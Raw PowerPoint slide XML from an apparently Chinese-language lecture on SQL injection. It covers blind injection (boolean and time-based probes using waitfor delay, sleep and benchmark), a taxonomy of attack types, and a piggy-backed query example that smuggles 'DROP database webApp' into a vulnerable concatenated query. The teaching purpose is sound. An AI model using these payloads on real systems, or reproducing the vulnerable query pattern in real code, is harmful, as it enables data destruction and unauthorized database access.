              <a:t>注入，需要通过多次进行真假的询问来对内容进行逐字符的猜解</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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2507909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154494"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拓展实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063900" y="1464361"/>
            <a:ext cx="10363826" cy="4241493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲注分类</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于内容</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2 and 1=2"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>If the content of the page that returns 'true' is different than that of the page that returns 'false', then the attacker is able to distinguish when the executed query returns true or false.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于时间</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> delay '00:00:10'--" (Microsoft SQL Server)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常搭配 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sleep()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>benchmark()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过服务器响应的时间可以判断出语句成功或失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20136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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 分类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  ——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>按攻击手段分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394031" y="1300421"/>
            <a:ext cx="9294752" cy="4166303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Piggy-backed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Queries  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>命令语句攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>• Tautologies   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>恒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>真命题攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Alternate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Encodings   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>编码攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Illegal/Logically Incorrect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Queries  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>非法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>查询攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Query   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>联合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1"/>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Procedures  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>过程的注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358620" y="5050174"/>
            <a:ext cx="9155391" cy="2031325"/>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 [A Classification of SQL Injection Attack Techniques and Countermeasures]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cc.gatech.edu/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>orso/papers/halfond.viegas.orso.ISSSE06.presentation.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A Classification of SQL Injection Attacks and Countermeasures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>://pdfs.semanticscholar.org/81a5/02b52485e52713ccab6d260f15871c2acdcb.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240001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dirty="0"/>
              <a:t>Piggy-backed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Queries</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2506858"/>
            <a:ext cx="10482106" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Insert additional queries to be executed by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= “SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> WHERE” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>+“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>login=‘” + login + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>'AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>pin=” + pin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input pin as “0; DROP database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>webApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>queryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>= “SELECT info FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>WHERE login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=‘name' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>pin=0; DROP database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" u="sng" dirty="0" err="1"/>
              <a:t>webApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="1537361"/>
            <a:ext cx="8807215" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0"/>
              <a:t>多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>命令语句攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者注入额外查询到原来的查询，提取数据，添加或修改数据，执行拒绝服务或执行远程命令。在这种情况下，攻击者并不打算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改预期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206399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0"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Tautologies </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127902" y="2416287"/>
            <a:ext cx="10482106" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
